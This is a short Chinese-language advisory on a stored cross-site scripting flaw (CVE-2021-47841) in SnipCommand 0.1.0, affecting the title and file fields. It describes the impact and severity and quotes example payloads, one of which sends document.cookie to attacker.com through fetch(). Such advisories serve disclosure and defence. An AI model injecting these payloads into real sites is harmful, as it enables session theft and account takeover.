CVE-2021-47841SnipCommand 0.1.0版本存在存储型跨站脚本漏洞,攻击者可以通过命令片段的标题或文件输入字段注入恶意JavaScript代码。由于该漏洞为存储型,恶意载荷会被永久保存在服务器端或应用程序数据库中,所有访问包含恶意内容的页面用户都会受到攻击。攻击者利用此漏洞可以窃取用户会话cookie、劫持用户账号、进行钓鱼攻击,甚至通过诱导用户执行特定操作触发远程命令执行。该漏洞的CVSS评分为6.1,属于中危级别,攻击复杂度低但需要用户交互,攻击者可通过网络远程利用此漏洞。
SnipCommand是一款命令片段管理工具,0.1.0版本在处理用户输入的标题(title)和文件(file)字段时未进行充分的输入验证和输出编码。攻击者可以在这些字段中插入恶意JavaScript代码,如:<script>alert(document.cookie)</script>或<img src=x onerror=fetch('https://attacker.com/steal?cookie='+document.cookie)>等Payload。由于应用未对用户输入进行HTML实体编码直接存储并回显到页面,恶意脚本会在其他用户访问该命令片段时被浏览器执行。攻击者利用存储型XSS配合社会工程学技术,可以诱导管理员或普通用户执行进一步的操作,从而实现远程代码执行。漏洞利用需要攻击者创建或修改命令片段,诱使其他用户访问恶意内容页面。